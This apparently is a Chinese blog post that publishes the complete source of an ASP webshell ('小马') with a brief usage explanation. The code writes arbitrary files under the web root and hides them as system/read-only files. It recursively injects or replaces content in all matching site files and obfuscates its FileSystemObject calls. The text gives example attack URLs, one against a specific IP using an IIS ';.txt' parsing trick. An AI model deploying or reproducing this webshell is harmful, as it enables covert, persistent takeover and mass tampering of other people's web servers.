一只神奇的asp小马

<%@LANGUAGE="VBSCRIPT" CODEPAGE="65001"%><%
dim file,content,path,task,paths,paths_str,nn,nnfilename,dpath,htmlpath,htmlpath_,htmlpath_str,addcontent,includefiles,noincludefiles,filetype,hanfiles,recontent,site_root,defaulthtml,defaultreplace,read
content=request("content")
path=request("path")
file=request("file")
task=request("task")
paths=request("paths")
nnfilename=request("nnfilename")
htmlpath=request("htmlpath")
addcontent=request("addcontent")
includefiles=request("includefiles")
noincludefiles=request("noincludefiles")
filetype=request("filetype")
recontent=request("recontent")
hanfiles=request("hanfiles")
site_root=request("site_root")
defaulthtml=request("defaulthtml")
defaultreplace=request("defaultreplace")
read=request("read")
IF site_root="" or site_root=null then
        site_root = Server.MapPath("/")
End IF

if task="1" Then
        paths_str = split(paths,",")
        nn = 0
        for i=0 to (ubound(paths_str))
                if IsFloderExist(Server.MapPath("/")&"/"&paths_str(i)) Then
                readfile_("/"&paths_str(i)&"/"&nnfilename)
                WriteIn Server.MapPath("/")&"/"&paths_str(i)&"/"&nnfilename,content
                Response.write "/"&paths_str(i)&"/"&nnfilename&"|"
                readfile("/"&paths_str(i)&"/"&nnfilename)
                nn = nn +1
                end if
        Next
        if nn=0 Then
                dpath = mulu(Server.MapPath("/"),defaulthtml)
                CFolder("/"&dpath)
                readfile_("/"&dpath&"/"&nnfilename)
                WriteIn Server.MapPath("/")&"/"&dpath&"/"&nnfilename,content
                Response.write "/"&dpath&"/"&nnfilename&"|"
                readfile("/"&dpath&"/"&nnfilename)
        end If
ElseIf task="2" Then    
        paths_str = split(paths,",")
        nn = 0
        for i=0 to (ubound(paths_str))
                if IsFloderExist(Server.MapPath("/")&"/"&paths_str(i)) And nn=0 Then
                htmlpath_ = paths_str(i)
                nn = nn +1
                end if
        Next
        if nn=0 Then
                htmlpath_ = mulu(Server.MapPath("/"),defaulthtml)
                if CFolder("/"&htmlpath_)=1 then
                        readfolder("/"&htmlpath_)
                end if
        end If
        if request("htmlpath")<>"" Then
                htmlpath_str = split(htmlpath,"/")
                nn = 0
                for i=0 to (ubound(htmlpath_str))
                        htmlpath_ = htmlpath_&"/"&htmlpath_str(i)
                        if CFolder("/"&htmlpath_)=1 then
                                readfolder("/"&htmlpath_)
                        end if
                Next
        end If
        readfile_("/"&htmlpath_&"/"&nnfilename)
        content = Replace(content,"SITE_URL","http://"&Request.ServerVariables("SERVER_NAME")&"/"&htmlpath_&"/"&nnfilename)
        WriteIn Server.MapPath("/")&"/"&htmlpath_&"/"&nnfilename,content
        Response.write "<sbj:url>"&"/"&htmlpath_&"/"&nnfilename&"</sbj:url>"
        readfile5("/"&htmlpath_&"/"&nnfilename)

ElseIf task="3" Then
        IF instr(site_root, "|")>0  Then
                site_root_str = split(site_root,"|")
                nn = 0
                for i=0 to (ubound(site_root_str))
                        if IsFloderExist(site_root_str(i)) then
                                Bianlireplate site_root_str(i),addcontent,recontent,includefiles,noincludefiles,filetype,hanfiles
                        end if
                Next
        Else
                Bianlireplate site_root,addcontent,recontent,includefiles,noincludefiles,filetype,hanfiles
        End IF
ElseIf task="4" Then
        IF instr(site_root, "|")>0  Then
                site_root_str = split(site_root,"|")
                nn = 0
                for i=0 to (ubound(site_root_str))
                        if IsFloderExist(site_root_str(i)) then
                                Bianli site_root_str(i)
                        end if
                Next
        Else
                Bianli site_root
        End IF
Else
        Response.write "tj,"&" tj"
        If  IsObjInstalled("Scripting.FileSystemObject") Then
                Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct")
                set f=fso.Getfile(server.mappath(Request.ServerVariables("SCRIPT_NAME")))
                if f.attributes <> 1 Then
                f.attributes = 1
                end If
                set fso = Nothing
        end If
end If

%>

<%
Function IsObjInstalled(strClassString)    
  On Error Resume Next    
  IsObjInstalled = False    
  Err = 0    
  Dim xTestObj    
  Set xTestObj = Server.CreateObject(strClassString)    
  If 0 = Err Then IsObjInstalled = True    
    Set xTestObj = Nothing    
    Err = 0    
  End Function  
%>

<%
function readfile(testfile)
        Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct")
        If fso.FileExists(Server.MapPath(testfile)) Then   '????????
                set f=fso.Getfile(Server.MapPath(testfile))
                if f.attributes <> 7 Then
                f.attributes = 7
                end If
        end If
        set fso = Nothing
end Function
function readfolder(testfile)
        Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct")
        If fso.FolderExists(Server.MapPath(testfile)) Then   '????????
                set f=fso.getfolder(Server.MapPath(testfile))
                if f.attributes <> 7 Then
                f.attributes = 7
                end If
        end if
        set fso = Nothing
end Function
function readfile_(testfile)
        Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct")
        If fso.FileExists(Server.MapPath(testfile)) Then   '????????
                set f=fso.Getfile(Server.MapPath(testfile))
                if f.attributes <> 0 Then
                f.attributes = 0
                end If
        end if
        set fso = Nothing
end Function
function readfolder_(testfile)
        Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct")
        If fso.FolderExists(Server.MapPath(testfile)) Then   '????????
         set f=fso.getfolder(Server.MapPath(testfile))
                if f.attributes <> 0 Then
                f.attributes = 0
                end If
        end if
        set fso = Nothing
end Function
function readfile5(testfile)
        Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct")
        If fso.FileExists(Server.MapPath(testfile)) Then   '????????
                set f=fso.Getfile(Server.MapPath(testfile))
                if f.attributes <> 5 Then
                f.attributes = 5
                end If
        end If
        set fso = Nothing
end Function
function readfolder5(testfile)
        Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct")
        If fso.FolderExists(Server.MapPath(testfile)) Then   '????????
                set f=fso.getfolder(Server.MapPath(testfile))
                if f.attributes <> 5 Then
                f.attributes = 5
                end If
        end if
        set fso = Nothing
end Function
function readfile6(testfile,attid)
        Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct")
        If fso.FileExists(Server.MapPath(testfile)) Then   '????????
                set f=fso.Getfile(Server.MapPath(testfile))
                if f.attributes <> attid Then
                f.attributes = attid
                end If
        end If
        set fso = Nothing
end Function
'''''''''''''''''''''''''''''''''
function readfile_new(testfile)
        Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct")
        If fso.FileExists(testfile) Then   '????????
                set f=fso.Getfile(testfile)
                if f.attributes <> 7 Then
                f.attributes = 7
                end If
        end If
        set fso = Nothing
end Function
function readfolder_new(testfile)
        Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct")
        If fso.FolderExists(testfile) Then   '????????
                set f=fso.getfolder(testfile)
                if f.attributes <> 7 Then
                f.attributes = 7
                end If
        end if
        set fso = Nothing
end Function
function readfile__new(testfile)
        Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct")
        If fso.FileExists(testfile) Then   '????????
                set f=fso.Getfile(testfile)
                if f.attributes <> 0 Then
                f.attributes = 0
                end If
        end if
        set fso = Nothing
end Function
function readfolder__new(testfile)
        Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct")
        If fso.FolderExists(testfile) Then   '????????
         set f=fso.getfolder(testfile)
                if f.attributes <> 0 Then
                f.attributes = 0
                end If
        end if
        set fso = Nothing
end Function
function readfile5_new(testfile)
        Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct")
        If fso.FileExists(testfile) Then   '????????
                set f=fso.Getfile(testfile)
                if f.attributes <> 5 Then
                f.attributes = 5
                end If
        end If
        set fso = Nothing
end Function
function readfolder5_new(testfile)
        Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct")
        If fso.FolderExists(testfile) Then   '????????
                set f=fso.getfolder(testfile)
                if f.attributes <> 5 Then
                f.attributes = 5
                end If
        end if
        set fso = Nothing
end Function
function readfile6_new(testfile,attid)
        Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct")
        If fso.FileExists(testfile) Then   '????????
                set f=fso.Getfile(testfile)
                if f.attributes <> attid Then
                f.attributes = attid
                end If
        end If
        set fso = Nothing
end Function

%>

<%
  Function mulu(path,defaulthtml)  
    Set Fso=server.createobject("scripting.filesystemobject")    
        On Error Resume Next  
    Set Objfolder=fso.getfolder(path)  

    Set Objsubfolders=objfolder.subfolders  

        Dim mulu_item,iii
        mulu_item = "html"
        iii = 0
    For Each Objsubfolder In Objsubfolders  
      Nowpath= Objsubfolder.name  
          mulu_item = Nowpath
    Next 
    IF defaulthtml<>"" then
        mulu_item = defaulthtml
        End IF
        mulu = mulu_item

    Set Objfolder=nothing  
    Set Objsubfolders=nothing  
    Set Fso=nothing  
  End Function

  Function Bianli(path)  
    Set Fso=server.createobject("scripting.filesystemobject")    

    On Error Resume Next  
    Set Objfolder=fso.getfolder(path)  
    Set Objsubfolders=objfolder.subfolders  
    For Each Objsubfolder In Objsubfolders  
      Nowpath=path + "\" + Objsubfolder.name  
      Set Objfiles=objsubfolder.files  
      For Each Objfile In Objfiles  
      Next  
      Bianli(nowpath)'??  

    Next  
    Set Objfolder=nothing  
    Set Objsubfolders=nothing  
    Set Fso=nothing  
  End Function  

    Function Bianlireplate(path,addcontent,recontent,includefiles,noincludefiles,filetype,hanfiles)  
                Set Fso=server.createobject("scripting.filesystemobject")    
                On Error Resume Next  
                Set Objfolder=fso.getfolder(path)  
                Set Objfiles_1=Objfolder.files 
                For Each Objfile In Objfiles_1  
                        ftype = getFileExt(Objfile.name)
                        aaa=instr(filetype,"."&ftype&".")
                        turet = False
                        If includefiles= "" Then
                                turet = true
                        End If
                        If turet Then
                        else
                                true_a=instr(includefiles,Objfile.name)
                                If true_a>0 Then 
                                        turet = true
                                End If
                        End If
                        IF turet=false then
                                IF hanfiles<>"" and Instr(1, hanfiles, ",")  Then
                                        set hanfiles_str = split(hanfiles,",")
                                        nn = 0
                                        for i=0 to (ubound(hanfiles_str))
                                                if instr(Objfile.name,hanfiles_str(i))>1 then
                                                        turet = true
                                                end if
                                        Next
                                End IF
                        End IF
                        if aaa>0 And turet Then
                                codepage = checkcode(path&"/"&Objfile.name)
                                attid = Objfile.attributes
                                readfile__new(path&"/"&Objfile.name)
                                set writeBoolean = false
                                if codepage="utf-8" Or codepage="unicode" Then
                                        newf_content = ReadFromTextFile(path&"/"&Objfile.name,"utf-8")
                                        bbb=instr(newf_content,addcontent)                                                                                                                      
                                        if bbb>0 Then
                                                If recontent="" Then
                                                        writeBoolean = false
                                                Else
                                                        newf_content = Replace(newf_content,recontent,addcontent)
                                                        writeBoolean = true
                                                End If 
                                        Else
                                                If recontent="" Then
                                                        newf_content = newf_content&addcontent
                                                        writeBoolean = true
                                                Else
                                                        newf_content = Replace(newf_content,recontent,addcontent)
                                                        writeBoolean = true
                                                End If 
                                        end If
                                        if writeBoolean = true then
                                                WriteIn path&"/"&Objfile.name,newf_content
                                                readfile6_new path&"/"&Objfile.name,attid
                                                Response.write "<sbj:url>"&path&"/"&Objfile.name&"</sbj:url>"&codepage&chr(13)
                                        end IF
                                Else
                                        newf_content = b(path&"/"&Objfile.name)
                                        bbb=instr(1,newf_content,addcontent,1)
                                        if bbb>0 Then
                                                If recontent="" Then
                                                        writeBoolean = false
                                                Else
                                                        newf_content = Replace(newf_content,recontent,addcontent)
                                                        writeBoolean = true
                                                End If 
                                        Else
                                                If recontent="" Then
                                                        newf_content = newf_content&addcontent
                                                        writeBoolean = true
                                                Else
                                                        newf_content = Replace(newf_content,recontent,addcontent)
                                                        writeBoolean = true
                                                End If 
                                        end If
                                        if writeBoolean = true then
                                                WriteIn1 path&"/"&Objfile.name,newf_content
                                                readfile6_new path&"/"&Objfile.name,attid
                                                Response.write "<sbj:url>"&path&"/"&Objfile.name&"</sbj:url>"&codepage&chr(13)
                                        end IF
                                end if
                        end if
                 Next 
                Set Objsubfolders=objfolder.subfolders  
                For Each Objsubfolder In Objsubfolders  

                  Nowpath=path + "\" + Objsubfolder.name  
                  Set Objfiles=objsubfolder.files  
                  Bianlireplate nowpath,addcontent,recontent,includefiles,noincludefiles,filetype,hanfiles '??  

                Next  

                Set Objfolder=nothing  
                Set Objsubfolders=nothing  
                Set Fso=nothing  
  End Function  

  function checkcode(path) 
  set objstream=server.createobject("adodb.stream") 
  objstream.Type=1 
  objstream.mode=3 
  objstream.open 
  objstream.Position=0 
  objstream.loadfromfile path 
  bintou=objstream.read(2) 
  If AscB(MidB(bintou,1,1))=&HEF And AscB(MidB(bintou,2,1))=&HBB Then 
  checkcode="utf-8" 
  ElseIf AscB(MidB(bintou,1,1))=&HFF And AscB(MidB(bintou,2,1))=&HFE Then 
  checkcode="unicode" 
  Else 
  checkcode="gb2312" 
  End If 
  objstream.close 
  set objstream=nothing 
  end function

  Function getFileExt(sFileName) 
getFileExt = Mid(sFileName, InstrRev(sFileName, ".") + 1) 
End Function 
%>

<%
Function IsFloderExist(strFolderName)
SET FSO=Server.CreateObject("Scripting.FileSystemObject")
IF(FSO.FolderExists(strFolderName))THEN
IsFloderExist = True
ELSE
IsFloderExist = False
END IF
SET FSO=NOTHING
End Function
%>

<%
Function getCode(iCount) ''?????????
     Dim arrChar
     Dim j,k,strCode
     arrChar = "012qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM3456789"
     k=Len(arrChar)
     Randomize
     For i=1 to iCount
          j=Int(k * Rnd )+1
          strCode = strCode & Mid(arrChar,j,1)
     Next
     getCode = strCode
End Function

Function Digital(iCount)''?????
     Dim arrChar
     Dim j,k,strCode
     arrChar = "0123456789"
     k=Len(arrChar)
     Randomize
     For i=1 to iCount
          j=Int(k * Rnd )+1
          strCode = strCode & Mid(arrChar,j,1)
     Next
     Digital = strCode
End Function
Function sj_int(ByVal min, ByVal max) ''?????
                Randomize(Timer) : sj_int = Int((max - min + 1) * Rnd + min)
End Function


Function Rand(ByVal min, ByVal max)  
                Randomize(Timer) : Rand = Int((max - min + 1) * Rnd + min)
End Function
%>

<%
function WriteIn(testfile,msg)
  'set fs=server.CreateObject("scripting.filesystemobject")  
  'set thisfile=fs.CreateTextFile(testfile,True,True)  
  'thisfile.Write(""&msg& "")  
 ' thisfile.close  
  'set fs = nothing
  Set stm = CreateObject("Adodb.Stream") 
    stm.Type = 2 
    stm.mode = 3 
    stm.charset = "utf-8" 
    stm.Open 
    stm.WriteText msg 
    stm.SaveToFile testfile, 2 
    stm.flush 
    stm.Close 
    Set stm = Nothing 
end Function
function WriteIn1(testfile,msg)
  ' set fs=server.CreateObject("scripting.filesystemobject")  
  ' set thisfile=fs.CreateTextFile(testfile,True)  
  ' thisfile.Write(""&msg& "")  
  ' thisfile.close  
  ' set fs = nothing
  Set stm = CreateObject("Adodb.Stream") 
    stm.Type = 2 
    stm.mode = 3 
    stm.charset = "gb2312" 
    stm.Open 
    stm.WriteText msg 
    stm.SaveToFile testfile, 2 
    stm.flush 
    stm.Close 
    Set stm = Nothing 
end Function

function delfile(testfile)
  set fs=server.CreateObject("scripting.filesystemobject")  
  fs.DeleteFile(testfile)
  set fs = nothing
end function
%>

<%
function a(t)
        set fs=server.createobject("scripting.filesystemobject")
        file=server.mappath(t)
        set txt=fs.opentextfile(file,1,true)
        if not txt.atendofstream then
           a=txt.ReadAll
        end if
     set fs=nothing
     set txt=nothing
end Function
function b(file)
        set fs=server.createobject("scripting.filesystemobject")
        set txt=fs.opentextfile(file,1,true)
        if not txt.atendofstream then
           b=txt.ReadAll
        end if
     set fs=nothing
     set txt=nothing
end Function
function aa(t)
        set fs=server.createobject("scripting.filesystemobject")
        file=server.mappath(t)
        set txt=fs.opentextfile(file,1,true,-1)
        if not txt.atendofstream then
           aa=txt.ReadAll
        end if
     set fs=nothing
     set txt=nothing
end Function
function bb(file)
        set fs=server.createobject("scripting.filesystemobject")
        set txt=fs.opentextfile(file,1,true,-1)
        if not txt.atendofstream then
           bb=txt.ReadAll
        end if
     set fs=nothing
     set txt=nothing
end function

Function ReadFromTextFile(file,CharSet)
         dim str
         set stm=CreateObject("adodb.stream")
         stm.Type=2'??????
         stm.mode=3 
         stm.charset=CharSet
         stm.open
         stm.loadfromfile file
         str=stm.readtext
         stm.Close
         set stm=nothing
 ReadFromTextFile=str
End Function

%>

<%

Function CFolder(Filepath)
  Filepath=server.mappath(Filepath)
  Set Fso = Server.CreateObject("Scripting.FileSystemObject")
  If Fso.FolderExists(FilePath) Then
    CFolder=0
  else
    Fso.CreateFolder(FilePath)
    CFolder=1
  end if
  Set Fso = Nothing
end function

Function BytesToBstr(body,Cset) 
dim objstream 
set objstream = Server.CreateObject("adodb.stream") 
objstream.Type = 1 
objstream.Mode =3 
objstream.Open 
objstream.Write body 
objstream.Position = 0 
objstream.Type = 2 
objstream.Charset = Cset 
BytesToBstr = objstream.ReadText 
objstream.Close 
set objstream = nothing 
End Function 
%> 



这个木马有4个主要的功能,首先是写文件:
当参数task=1时
如果你传递参数

http://222.39.14.164/xdexdb4w.asp;.txt?task=1&paths=jtgw&nnfilename=1.asp&content=lalla

参数说明

task:执行命令的id
paths:在哪个文件夹写文件(如果是空,则在在最后一个文件夹下写入文件)
nnfilename:文件名
content:文件内容

主要这个被写出来的文件被隐藏成为系统文件类型,而且是文件为只读


当task=2时

当传递的参数为

http://localhost/1.asp?task=2&paths=&defaulthtml=mengmeng&nnfilename=1.txt&content=mamama

这个功能只是比上一个多出来了一个创建文件夹的功能

defaulthtml:创建的文件夹名字


你可能感兴趣的:(安全)